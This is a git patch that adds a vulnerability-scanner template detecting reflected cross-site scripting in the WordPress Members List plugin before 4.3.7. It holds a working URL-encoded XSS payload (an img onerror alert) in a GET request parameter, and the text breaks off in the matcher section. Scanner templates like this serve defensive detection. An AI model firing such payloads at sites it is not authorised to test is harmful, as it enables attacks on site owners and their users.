From 58bd9096590972aefabaffe13ae72e5f1464fbf6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 9 Jul 2022 18:42:35 +0530 Subject: [PATCH] Create members-list-xss.yaml --- .../wordpress/members-list-xss.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 vulnerabilities/wordpress/members-list-xss.yaml diff --git a/vulnerabilities/wordpress/members-list-xss.yaml b/vulnerabilities/wordpress/members-list-xss.yaml new file mode 100644 index 0000000000..27b69120cc --- /dev/null +++ b/vulnerabilities/wordpress/members-list-xss.yaml @@ -0,0 +1,33 @@ +id: members-list-xss + +info: + name: Members List < 4.3.7 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues. + reference: + - https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648 + tags: wp,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">